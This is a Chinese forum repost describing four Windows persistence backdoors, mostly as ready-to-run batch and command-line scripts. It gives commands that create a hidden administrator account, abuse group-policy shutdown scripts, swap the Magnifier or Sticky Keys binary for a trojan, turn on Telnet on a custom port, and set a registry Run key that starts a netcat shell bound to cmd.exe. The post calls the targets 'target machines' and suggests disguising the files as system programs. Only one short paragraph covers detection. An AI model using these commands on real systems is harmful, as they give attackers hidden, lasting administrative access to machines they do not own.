设为首页 收藏本站
查看: 1214|回复: 0

[经验分享] windows后门

[复制链接]

尚未签到

发表于 2017-12-8 08:04:58 | 显示全部楼层 |阅读模式
  原文:揭秘Windows系统的四个后门

组策略欺骗后门
  创建一个批处理文件add.bat,内容是:



@echo off
net user hack$ test168 /add
net localgroup administrators hack$ /add
exit
  (2)利用
  上传运行gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。
  这样就实现了当系统关机时创建hack$用户,及时被删了,关机时又会再次创建。
  还可以实现开机时添加账户,关机时删除账户等等。可以把bat转换成exe,上传到目标机器,伪装成系统程序等等。

放大镜程序后门
  思路:伪造替换 magnify.exe
  (1) 构造批处理脚本:magnify.bat



@echo off
net user hack$ test168 /add
net localgroup administrators hack$ /add
%Windir%\system32\nagnify.exe
exit
  作用:先创建管理员用户,在运行原来的放大镜程序
  (2)文件格式转换
  利用bat2com / com2exe,BatToEXE(图形化工具)等工具把Bat文件转换成exe文件,如:
  bat2com magnify.bat       将magnify.bat转换成magnify.com
com2exe magnify.com       将magnify.com转换成magnify.exe
  (3)利用批处理自动替换



@echo off
copy %Windir%\system32\dllcache\magnify.exe nagnify.exe     将放大镜程序备份为nagnify.exe
copy %Windir%\system32\magnify.exe nagnify.exe         
replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache   替换放大镜程序
replace.exe %Windir%\magnify.exe %Windir%\system32
exit

  (4)使用:登陆时通过组合键 Win+U 调用
  (5) 防范措施
  进入%Windir%\system32\查看magnify.exe的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。
  当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我们也可以先运行magnify.exe,然后运行查看是否有可疑的用户。
  如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复正常的放大镜程序。当然,我们也可以做得更彻底一些,用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身,构造一个magnify.exe,通过其警告攻击者或者进行入侵监控和取证。
  补充:与放大镜后门类似的还有“粘滞键”后门,即按下SHIEF键五次可以启动粘滞键功能,其利用和防范措施与放大镜后门类似,只是将magnify.exe换成了sethc.exe。

telnet后门
  tlntadmn config port=2233 //修改 telnet默认端口
sc config tlntsvr start= auto
net start telnet
  一个批处理,可以根据需要修改。转换成exe等等,思路很多。。。



@echo off
sc config tlntsvr start= auto
@net start telnet
@tlntadmn config sec =passwd
@tlntadmn config port = 2233
@net user hack& 123456789 /add
@net localgroup administrators hack$ /add
@pause
@md c:\windows\ShareFolder
@net share MyShare=c:\windows\ShareFolder
  msf权限维持模块:exploit/windows/local/registry_persistence
  可以修改注册表,增加后门自启动代码.



reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
  相关文章:Windows、Linux后门解析  
  http://www.freebuf.com/articles/system/91791.html

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-422008-1-1.html 上篇帖子: coTurn 运行在Windows平台的方法及服务与客户端运行交互流程和原理 下篇帖子: C#版-Redis缓存服务器在Windows下的使用
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表